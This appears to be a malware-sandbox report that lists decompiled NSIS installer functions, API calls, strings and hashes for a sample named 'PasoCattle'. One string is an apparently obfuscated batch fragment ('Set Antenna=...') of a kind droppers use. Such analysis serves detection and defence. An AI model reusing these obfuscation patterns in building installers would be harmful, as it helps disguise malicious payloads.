Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Sleep(%d), xrefs: 0040169D
BringToFront, xrefs: 004016BD
Rename: %s, xrefs: 004018F8
Rename on reboot: %s, xrefs: 00401943
Call: %d, xrefs: 0040165A
SetFileAttributes failed., xrefs: 004017A1
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
detailprint: %s, xrefs: 00401679
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Aborting: "%s", xrefs: 0040161D
Rename failed: %s, xrefs: 0040194B
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
SetFileAttributes: "%s":%08X, xrefs: 0040177B
CreateDirectory: "%s" (%d), xrefs: 004017BF
Jump: %d, xrefs: 00401602
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

"F, xrefs: 00405A4B
.DEFAULT\Control Panel\International, xrefs: 004059C5
RichEdit20A, xrefs: 00405BE2, 00405BE7
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
RichEd32, xrefs: 00405BD4
F, xrefs: 00405A22
RichEd20, xrefs: 00405BC9
@jG, xrefs: 00405AF2
.exe, xrefs: 00405A69
RichEdit, xrefs: 00405BF0
_Nb, xrefs: 00405AFD

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,771B23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: wrote %d to "%s", xrefs: 00401BD0
File: error, user retry, xrefs: 00401B40
File: error creating "%s", xrefs: 00401AF0
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user abort, xrefs: 00401B53
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
open, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user cancel, xrefs: 00401B93

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
API String ID: 4286501637-2478300759
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Error launching installer, xrefs: 00403603
Null, xrefs: 004036AA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Inst, xrefs: 00403698
soft, xrefs: 004036A1

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,0042A4AD,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-, xrefs: 004033FD
... %d%%, xrefs: 004034C8
pAB, xrefs: 004033AB

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-$pAB
API String ID: 651206458-1427982325
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,0042A4AD,771B23A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNELBASE(00000000), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8
open, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$open
API String ID: 1459762280-1711415406
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNELBASE(00000000), ref: 00402387

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

